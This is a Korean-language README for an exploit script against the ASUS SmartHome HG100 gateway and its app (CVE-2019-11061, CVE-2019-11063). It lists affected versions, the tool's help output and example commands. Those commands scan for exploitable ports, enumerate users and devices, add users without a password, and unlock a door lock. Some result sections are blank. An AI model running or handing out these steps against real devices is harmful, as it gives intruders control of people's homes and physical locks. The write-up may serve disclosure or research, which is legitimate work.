
CVE-2019-11061 및 CVE-2019-11063용 ASUS SmartHome Exploit
CVE-2019-11061 : HG100의 취약한 접근 제어
영향을 받는 제품 : ASUS SmartHome Gateway HG100 펌웨어 버전 < 4.00.09
CVE-2019-11063 : SmartHome 앱의 취약한 접근 제어
영향을 받는 제품 : ASUS SmartHome Android 앱 버전 < 3.0.45_190701
공격자가 HG100과 동일한 내부 네트워크에 있거나 동반 앱(android 또는 iPhone)이 설치된 모바일 기기와 동일한 네트워크에 있는 경우, 공격자는 해당 기기에 제어 요청을 보낼 수 있습니다.
usage: exploit.py scan [-h] [-v] target_ip
scan exploitable port
positional arguments:
target_ip scan ip
optional arguments:
-h, --help show this help message and exit
-v show account email list
usage: exploit.py cmd [-h]
(-u | -l | -s device_id | -c device_id status | -a username)
[--user username] [--new-user username] [-v]
target
send command to target
positional arguments:
target <target-ip>:<port>
optional arguments:
-h, --help show this help message and exit
-u, --list-user list all user in device
-l, --list-device list all device status
-s device_id, --device-status device_id
list device status
-c device_id status, --device-control device_id status
control device status
-a username, --add-user username
add a user to device
--user username assign user for cmd
--new-user username create a new user for cmd
-v show account email list
예시:
$ ./exploit.py cmd https://10.42.50.166:8083 -l
모바일 기기(android 또는 iPhone용 동반 앱이 설치된)의 익스플로잇 가능한 포트를 스캔합니다 :
참고: -v 옵션은 HG100에 추가된 사용자를 나열합니다.
또는
HG100의 익스플로잇 가능한 포트를 스캔합니다 :
HG100에 추가된 모든 사용자를 가져옵니다:

또는 새 사용자를 추가합니다:
참고: "cmd" 인수에 https://10.42.50.166:8083을 사용하세요.
예시:
$ ./exploit.py cmd https://10.42.50.166:8083 -u
SmartHome Gateway 아래의 모든 장치 정보를 가져옵니다:
참고: --user 옵션을 설정하지 않으면 HG100의 첫 번째 사용자가 자동으로 선택됩니다. (비밀번호가 필요 없기 때문입니다)
앱과 비교:
DoorLock을 제어(잠금 해제)합니다.
참고: 1028 값은 -l 옵션(3단계)에서 얻은 값입니다.
결과:
